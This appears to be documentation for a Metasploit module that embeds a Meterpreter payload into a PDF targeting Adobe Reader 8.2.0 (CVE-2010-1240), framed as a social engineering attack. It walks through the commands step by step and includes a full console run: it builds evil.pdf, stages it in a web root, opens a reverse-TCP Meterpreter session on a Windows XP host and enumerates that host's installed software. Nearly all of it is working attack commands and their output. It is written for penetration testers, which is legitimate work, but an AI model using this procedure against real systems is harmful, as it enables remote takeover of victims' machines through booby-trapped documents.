Kenneth LaCroix
2.8 KiB
2.8 KiB
Vulnerable Application
This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.
Link to vulnerable software (OldVersion)[http://www.oldversion.com/windows/download/acrobat-reader-8-2-0]
Verification Steps
- Install application on the target machine
- Start msfconsole
- Do:
use exploit/windows/fileformat/adobe_pdf_embedded_exe - Do:
set payload [windows/meterpreter/reverse_tcp] - Do:
set LHOST [IP] - Do:
exploit - Do:
use [exploit/multi/handler] - Do:
set LHOST [IP] - Do:
exploit - Do:
Open PDF on target machine with vulnerable software
Scenarios
A run on Adobe Reader 8.2.0 and Windows XP (5.1 Build 2600, Service Pack 3)
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit
[*] Reading in '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
[*] Parsing '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[+] Parsing Successful. Creating 'evil.pdf' file...
[+] evil.pdf stored at /root/.msf4/local/evil.pdf
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > cp /root/.msf4/local/evil.pdf /var/www/html/evil.pdf
[*] exec: cp /root/.msf4/local/evil.pdf /var/www/html/evil.pdf
msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Sending stage (180291 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.5:1121) at 2019-12-09 14:17:10 -0700
meterpreter > sysinfo
Computer : COMPUTER_1
OS : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: COMPUTER_1\USER
meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on COMPUTER_1
Installed Applications
======================
Name Version
---- -------
Adobe Reader 8.2.0 8.2.0
[+] Results stored in: /root/.msf4/loot/20191209141758_default_192.168.1.5_host.application_783490.txt
```